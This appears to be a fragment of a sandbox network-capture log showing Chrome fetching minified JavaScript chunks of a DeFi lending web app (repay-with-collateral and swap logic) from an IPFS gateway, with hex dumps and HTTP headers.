                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 65 3a 52 2c 61 63 74 69 6f 6e 54 78 3a 46 2c 61 70 70 72 6f 76 61 6c 54 78 3a 5f 7d 7d 7d 2c 36 38 34 34 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 74 2e 64 28 72 2c 7b 5f 53 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 2c 62 55 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 2c 44 58 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 2c 24 6d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 3b 76 61 72 20 6e 3d 74 28 32 30 38 35 34 29 2c 61 3d 74 28 31 32 37 39 29 2c 6f 3d 74 28 37 30 37 39 34 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 76 61 72 20 72 2c 74 3d 65 2e 66 72 6f 6d 41 6d 6f 75 6e 74 2c 6f 3d 65 2e 66 72 6f 6d 41 73 73 65 74 44 61 74 61 2c 69 3d 65 2e 66 72 6f 6d
                                                                                                                                                                                                                                                  Data Ascii: e:R,actionTx:F,approvalTx:_}}},68448:function(e,r,t){t.d(r,{_S:function(){return i},bU:function(){return s},DX:function(){return u},$m:function(){return c}});var n=t(20854),a=t(1279),o=t(70794);function i(e){var r,t=e.fromAmount,o=e.fromAssetData,i=e.from
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 68 45 29 28 22 2d 31 22 29 3a 28 30 2c 61 2e 68 45 29 28 63 2e 68 65 61 6c 74 68 46 61 63 74 6f 72 29 2e 70 6c 75 73 28 66 29 2e 6d 69 6e 75 73 28 64 29 7d 7d 76 61 72 20 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 75 73 65 72 2c 74 3d 65 2e 61 6d 6f 75 6e 74 54 6f 52 65 63 65 69 76 65 41 66 74 65 72 53 77 61 70 2c 69 3d 65 2e 61 6d 6f 75 6e 74 54 6f 53 77 61 70 2c 73 3d 65 2e 66 72 6f 6d 41 73 73 65 74 44 61 74 61 2c 75 3d 65 2e 74 6f 41 73 73 65 74 44 61 74 61 2c 63 3d 65 2e 72 65 70 61 79 57 69 74 68 55 73 65 72 52 65 73 65 72 76 65 2c 6c 3d 65 2e 64 65 62 74 2c 64 3d 72 2e 69 73 49 6e 45 6d 6f 64 65 26 26 72 2e 75 73 65 72 45 6d 6f 64 65 43 61 74 65 67 6f 72 79 49 64 3d 3d 3d 73 2e 65 4d 6f 64 65 43 61 74 65 67 6f 72 79 49 64 3f
                                                                                                                                                                                                                                                  Data Ascii: hE)("-1"):(0,a.hE)(c.healthFactor).plus(f).minus(d)}}var s=function(e){var r=e.user,t=e.amountToReceiveAfterSwap,i=e.amountToSwap,s=e.fromAssetData,u=e.toAssetData,c=e.repayWithUserReserve,l=e.debt,d=r.isInEmode&&r.userEmodeCategoryId===s.eModeCategoryId?
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 29 2c 68 66 41 66 74 65 72 53 77 61 70 3a 79 2e 69 73 4c 65 73 73 54 68 61 6e 28 30 29 26 26 21 79 2e 65 71 28 2d 31 29 3f 30 3a 79 7d 7d 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 75 73 65 72 2c 74 3d 65 2e 75 73 65 72 52 65 73 65 72 76 65 2c 69 3d 65 2e 70 6f 6f 6c 52 65 73 65 72 76 65 2c 73 3d 65 2e 77 69 74 68 64 72 61 77 41 6d 6f 75 6e 74 2c 75 3d 28 30 2c 61 2e 68 45 29 28 72 2e 74 6f 74 61 6c 43 6f 6c 6c 61 74 65 72 61 6c 4d 61 72 6b 65 74 52 65 66 65 72 65 6e 63 65 43 75 72 72 65 6e 63 79 29 2c 63 3d 72 2e 63 75 72 72 65 6e 74 4c 69 71 75 69 64 61 74 69 6f 6e 54 68 72 65 73 68 6f 6c 64 2c 6c 3d 28 30 2c 61 2e 68 45 29 28 72 2e 68 65 61 6c 74 68 46 61 63 74 6f 72 29 2c 64 3d 72 2e 69 73 49 6e 45 6d 6f 64 65 26 26 72 2e 75
                                                                                                                                                                                                                                                  Data Ascii: ),hfAfterSwap:y.isLessThan(0)&&!y.eq(-1)?0:y}},u=function(e){var r=e.user,t=e.userReserve,i=e.poolReserve,s=e.withdrawAmount,u=(0,a.hE)(r.totalCollateralMarketReferenceCurrency),c=r.currentLiquidationThreshold,l=(0,a.hE)(r.healthFactor),d=r.isInEmode&&r.u
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC175INData Raw: 6e 2e 4c 31 29 28 7b 63 6f 6c 6c 61 74 65 72 61 6c 42 61 6c 61 6e 63 65 4d 61 72 6b 65 74 52 65 66 65 72 65 6e 63 65 43 75 72 72 65 6e 63 79 3a 73 2c 62 6f 72 72 6f 77 42 61 6c 61 6e 63 65 4d 61 72 6b 65 74 52 65 66 65 72 65 6e 63 65 43 75 72 72 65 6e 63 79 3a 28 30 2c 61 2e 68 45 29 28 65 2e 74 6f 74 61 6c 42 6f 72 72 6f 77 73 4d 61 72 6b 65 74 52 65 66 65 72 65 6e 63 65 43 75 72 72 65 6e 63 79 29 2c 63 75 72 72 65 6e 74 4c 69 71 75 69 64 61 74 69 6f 6e 54 68 72 65 73 68 6f 6c 64 3a 75 7d 29 29 2c 69 7d 7d 7d 5d 29 3b
                                                                                                                                                                                                                                                  Data Ascii: n.L1)({collateralBalanceMarketReferenceCurrency:s,borrowBalanceMarketReferenceCurrency:(0,a.hE)(e.totalBorrowsMarketReferenceCurrency),currentLiquidationThreshold:u})),i}}}]);


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  56192.168.2.549772209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC504OUTGET /_next/static/chunks/1811.1d478527d9c58149.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:44 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 29683
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreia6jh2gotkgpaknk4tne6o6r3ismguyunhh67cy3dq5wprbpcunv4"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/1811.1d478527d9c58149.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreia6jh2gotkgpaknk4tne6o6r3ismguyunhh67cy3dq5wprbpcunv4
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028478
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 33 35 66 34 36 37 63 37 62 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4235f467c7b-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 38 31 31 5d 2c 7b 33 34 36 33 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 59 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 7d 2c 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 35 39 34 39 39 29 2c 61 3d 72 28 38 31 37 31 39 29 2c 6f 3d 72 28 38 37 30 35 34 29 2c 73 3d 28 72 28 36 37 32 39 34 29 2c 72 28 38 35 38 39 33 29 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1811],{34637:function(e,t,r){r.d(t,{Y:function(){return d},Z:function(){return p}});var n=r(59499),a=r(81719),o=r(87054),s=(r(67294),r(85893));function i(e,t){var r=Object.keys(e);if(Ob
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 74 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6c 69 70 3a 22 74 65 78 74 22 2c 74 65 78 74 46 69 6c 6c 43 6f 6c 6f 72 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 7d 7d 7d 7d 29 29 2c 63 3d 28 30 2c 61 2e 5a 50 29 28 6f 2e 5a 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 74 68 65 6d 65 3b 72 65 74 75 72 6e 7b 62 6f 72 64 65 72 3a 22 30 70 78 22 2c 66 6c 65 78 3a 31 2c 63 6f 6c 6f 72 3a 74 2e 70 61 6c 65 74 74 65 2e 74 65 78 74 2e 6d 75 74 65 64 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 22 2c 22 26 2e 4d 75 69 2d 73 65 6c 65 63 74 65 64 2c 20 26 2e 4d 75 69 2d 73 65 6c 65 63 74 65 64 3a 68 6f 76 65 72 22 3a 7b 62 6f 72 64 65 72 3a 22 31 70 78 20 73 6f 6c 69 64 20 22 2e 63 6f 6e 63 61 74 28 74 2e 70 61 6c 65 74 74 65 2e 6f 74 68 65
                                                                                                                                                                                                                                                  Data Ascii: t,backgroundClip:"text",textFillColor:"transparent"}}}})),c=(0,a.ZP)(o.Z)((function(e){var t=e.theme;return{border:"0px",flex:1,color:t.palette.text.muted,borderRadius:"4px","&.Mui-selected, &.Mui-selected:hover":{border:"1px solid ".concat(t.palette.othe
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 3d 28 30 2c 61 2e 5a 50 29 28 6f 2e 5a 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 65 2e 74 68 65 6d 65 2e 70 61 6c 65 74 74 65 2e 62 61 63 6b 67 72 6f 75 6e 64 2e 68 65 61 64 65 72 2c 70 61 64 64 69 6e 67 3a 22 32 70 78 22 2c 68 65 69 67 68 74 3a 22 33 36 70 78 22 2c 77 69 64 74 68 3a 22 31 30 30 25 22 7d 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 73 2e 6a 73 78 29 28 63 2c 75 28 7b 7d 2c 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 73 2e 6a 73 78 29 28 6c 2c 75 28 7b 7d 2c 65 29 29 7d 7d 2c 38 31 38 31 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 52 65 70 61 79
                                                                                                                                                                                                                                                  Data Ascii: =(0,a.ZP)(o.Z)((function(e){return{backgroundColor:e.theme.palette.background.header,padding:"2px",height:"36px",width:"100%"}}));function d(e){return(0,s.jsx)(c,u({},e))}function p(e){return(0,s.jsx)(l,u({},e))}},81811:function(e,t,r){r.r(t),r.d(t,{Repay
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 65 63 74 28 72 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 72 2c 74 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 72 3d 65 2e 72 65 70 61 79 41 6d 6f 75 6e 74 2c 6e 3d 65 2e 70 6f 6f 6c 52 65 73 65 72 76 65 2c 6f 3d 65 2e 66 72 6f 6d 41 73 73 65 74 44 61 74 61 2c 73 3d 65 2e 69 73 57 72 6f 6e 67 4e 65 74 77 6f 72 6b 2c 69 3d 65 2e 73 78 2c 75 3d 65 2e 73 79 6d 62 6f 6c 2c 6c 3d 65 2e 72 61 74 65 4d 6f 64 65 2c 63 3d 65 2e 72 65 70 61 79 41 6c 6c 44 65 62 74 2c 64 3d 65 2e 75 73 65 46 6c
                                                                                                                                                                                                                                                  Data Ascii: ect(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}var V=function(e){var t,r=e.repayAmount,n=e.poolReserve,o=e.fromAssetData,s=e.isWrongNetwork,i=e.sx,u=e.symbol,l=e.rateMode,c=e.repayAllDebt,d=e.useFl
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 73 74 75 73 3a 46 2e 68 50 7d 29 29 3b 63 61 73 65 20 31 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 65 2e 73 74 6f 70 28 29 7d 7d 29 2c 65 29 7d 29 29 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 28 29 2c 67 61 73 4c 69 6d 69 74 52 65 63 6f 6d 6d 65 6e 64 61 74 69 6f 6e 3a 46 2e 65 42 5b 6d 2e 55 51 2e 72 65 70 61 79 43 6f 6c 6c 61 74 65 72 61 6c 5d 2e 6c 69 6d 69 74 2c 73 6b 69 70 3a 79 7c 7c 21 72 7c 7c 30 3d 3d 3d 70 61 72 73 65 46 6c 6f 61 74 28 72 29 7c 7c 70 2c 73 70 65 6e 64 65 72 3a 6e 75 6c 6c 21 3d 3d 28 74 3d 41 2e 61 64 64 72 65 73 73 65 73 2e 52 45 50 41 59 5f 57 49 54 48 5f 43 4f 4c 4c 41 54 45 52 41 4c 5f 41 44 41 50 54
                                                                                                                                                                                                                                                  Data Ascii: stus:F.hP}));case 1:case"end":return e.stop()}}),e)})));return function(){return e.apply(this,arguments)}}(),gasLimitRecommendation:F.eB[m.UQ.repayCollateral].limit,skip:y||!r||0===parseFloat(r)||p,spender:null!==(t=A.addresses.REPAY_WITH_COLLATERAL_ADAPT
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 72 29 29 3a 47 28 4f 62 6a 65 63 74 28 72 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 72 2c 74 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 7a 28 65 29 7b 76 61 72 20 74 3d 65 2e 70 6f 6f 6c 52 65 73 65 72 76 65 2c 72 3d 65 2e 73 79 6d 62 6f 6c 2c 6e 3d 65 2e 64 65 62 74 54 79 70 65 2c 73 3d 65 2e 75 73 65 72 52 65 73 65 72 76 65 2c
                                                                                                                                                                                                                                                  Data Ascii: riptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):G(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}function z(e){var t=e.poolReserve,r=e.symbol,n=e.debtType,s=e.userReserve,
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 65 3f 64 65 2e 74 6f 53 74 72 69 6e 67 28 29 3a 6e 65 2c 79 65 3d 28 30 2c 79 2e 68 45 29 28 6d 65 29 2e 6d 75 6c 74 69 70 6c 69 65 64 42 79 28 74 2e 70 72 69 63 65 49 6e 55 53 44 29 2e 74 6f 53 74 72 69 6e 67 28 29 2c 62 65 3d 64 65 2e 6d 75 6c 74 69 70 6c 69 65 64 42 79 28 74 2e 70 72 69 63 65 49 6e 55 53 44 29 2e 6d 75 6c 74 69 70 6c 69 65 64 42 79 28 31 30 30 2b 4e 75 6d 62 65 72 28 73 65 29 29 2e 64 69 76 69 64 65 64 42 79 28 31 30 30 29 2e 64 69 76 69 64 65 64 42 79 28 6c 65 2e 70 72 69 63 65 49 6e 55 53 44 29 2c 66 65 3d 51 28 51 28 7b 7d 2c 6c 65 29 2c 7b 7d 2c 7b 61 6d 6f 75 6e 74 3a 4a 7d 29 2c 76 65 3d 51 28 51 28 7b 7d 2c 74 29 2c 7b 7d 2c 7b 61 6d 6f 75 6e 74 3a 75 65 2e 63 75 72 72 65 6e 74 7d 29 3b 22 65 78 61 63 74 49 6e 22 3d 3d 3d 65 65
                                                                                                                                                                                                                                                  Data Ascii: e?de.toString():ne,ye=(0,y.hE)(me).multipliedBy(t.priceInUSD).toString(),be=de.multipliedBy(t.priceInUSD).multipliedBy(100+Number(se)).dividedBy(100).dividedBy(le.priceInUSD),fe=Q(Q({},le),{},{amount:J}),ve=Q(Q({},t),{},{amount:ue.current});"exactIn"===ee
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 3d 28 30 2c 77 2e 5a 29 28 50 28 29 2e 6d 61 72 6b 28 28 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 76 61 72 20 74 2c 72 3b 72 65 74 75 72 6e 20 50 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 65 2e 70 72 65 76 3d 65 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 69 66 28 5a 2e 75 6e 64 65 72 6c 79 69 6e 67 41 73 73 65 74 26 26 4e 2e 75 6e 64 65 72 6c 79 69 6e 67 41 73 73 65 74 26 26 28 22 65 78 61 63 74 49 6e 22 21 3d 3d 6c 7c 7c 5a 2e 61 6d 6f 75 6e 74 26 26 22 30 22 21 3d 3d 5a 2e 61 6d 6f 75 6e 74 26 26 21 69 73 4e 61 4e 28 2b 5a 2e 61 6d 6f 75 6e 74 29 29 26 26 28 22 65 78 61 63 74 4f 75 74 22 21 3d 3d 6c 7c 7c 4e 2e 61 6d 6f 75 6e 74 26 26 22 30 22 21 3d 3d 4e 2e 61 6d 6f 75 6e 74 26 26 21 69 73 4e
                                                                                                                                                                                                                                                  Data Ascii: =(0,w.Z)(P().mark((function e(){var t,r;return P().wrap((function(e){for(;;)switch(e.prev=e.next){case 0:if(Z.underlyingAsset&&N.underlyingAsset&&("exactIn"!==l||Z.amount&&"0"!==Z.amount&&!isNaN(+Z.amount))&&("exactOut"!==l||N.amount&&"0"!==N.amount&&!isN
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 28 22 72 65 74 75 72 6e 22 2c 28 30 2c 4f 2e 78 53 29 28 54 2c 73 2c 69 2c 74 2c 75 2c 6e 29 29 3b 63 61 73 65 20 36 3a 72 65 74 75 72 6e 20 65 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 2c 28 30 2c 4f 2e 5f 6e 29 28 54 2c 73 2c 69 2c 74 2c 75 2c 6e 29 29 3b 63 61 73 65 20 37 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 65 2e 73 74 6f 70 28 29 7d 7d 29 2c 65 29 7d 29 29 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 28 29 7d 7d 28 7b 63 68 61 69 6e 49 64 3a 48 2e 75 6e 64 65 72 6c 79 69 6e 67 43 68 61 69 6e 49 64 7c 7c 59 2c 75 73 65 72 41 64 64 72 65 73 73 3a 71 2c 73 77 61 70 56 61 72 69 61 6e 74 3a 65 65 2c 73 77 61 70 49 6e 3a 66
                                                                                                                                                                                                                                                  Data Ascii: ("return",(0,O.xS)(T,s,i,t,u,n));case 6:return e.abrupt("return",(0,O._n)(T,s,i,t,u,n));case 7:case"end":return e.stop()}}),e)})));return function(){return e.apply(this,arguments)}}()}}({chainId:H.underlyingChainId||Y,userAddress:q,swapVariant:ee,swapIn:f


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  57192.168.2.549771209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC504OUTGET /_next/static/chunks/8882.78d4e9d7872de2c1.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:44 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 29637
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreici5wdauqliymghdfd6ou3ifp65gdrlqti2ekwcg7m7mf7j5nvcc4"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/8882.78d4e9d7872de2c1.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreici5wdauqliymghdfd6ou3ifp65gdrlqti2ekwcg7m7mf7j5nvcc4
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 687018
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 33 35 39 38 30 34 33 38 30 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e42359804380-EWR
